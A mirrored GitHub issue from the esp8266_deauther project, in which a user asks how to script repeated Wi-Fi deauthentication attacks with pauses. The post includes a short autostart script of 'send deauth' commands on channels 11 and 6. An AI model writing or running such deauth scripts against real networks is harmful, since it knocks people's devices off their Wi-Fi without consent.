[GH-ISSUE #1287] Scripting Help repeating a deauth #639

Closed
opened 2026-02-28 00:03:59 +03:00 by kerem · 1 comment
Owner

Originally created by @chinswain on GitHub (Jul 31, 2020).
Original GitHub issue: https://github.com/SpacehuhnTech/esp8266_deauther/issues/1287

Is it possible to script a repeated disconnect with a pause to allow the target device to reconnect?
send deauth doesn't have a timeout (Until V3 but no scripting yet) "stop attack" seems to stop the script.

write autostart.txt send deauth 00:00:00:00:00:00 00:00:00:00:00:00 0 11
write autostart.txt delay 5s
write autostart.txt send deauth 00:00:00:00:00:00 00:00:00:00:00:00 0 6
write autostart.txt delay 5s
write autostart.txt send deauth 00:00:00:00:00:00 00:00:00:00:00:00 0 11
write autostart.txt delay 5s
write autostart.txt send deauth 00:00:00:00:00:00 00:00:00:00:00:00 0 6
Originally created by @chinswain on GitHub (Jul 31, 2020). Original GitHub issue: https://github.com/SpacehuhnTech/esp8266_deauther/issues/1287 Is it possible to script a repeated disconnect with a pause to allow the target device to reconnect? send deauth doesn't have a timeout (Until V3 but no scripting yet) "stop attack" seems to stop the script. ``` write autostart.txt send deauth 00:00:00:00:00:00 00:00:00:00:00:00 0 11 write autostart.txt delay 5s write autostart.txt send deauth 00:00:00:00:00:00 00:00:00:00:00:00 0 6 write autostart.txt delay 5s write autostart.txt send deauth 00:00:00:00:00:00 00:00:00:00:00:00 0 11 write autostart.txt delay 5s write autostart.txt send deauth 00:00:00:00:00:00 00:00:00:00:00:00 0 6 ```
kerem 2026-02-28 00:03:59 +03:00
Author
Owner

@stale[bot] commented on GitHub (Oct 29, 2020):

This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs. Thank you for your contributions.

<!-- gh-comment-id:718800756 --> @stale[bot] commented on GitHub (Oct 29, 2020): This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs. Thank you for your contributions.
Sign in to join this conversation.
No milestone
No project
No assignees
1 participant
Notifications
Due date
The due date is invalid or out of range. Please use the format "yyyy-mm-dd".

No due date set.

Dependencies

No dependencies set.

Reference
starred/esp8266_deauther#639
No description provided.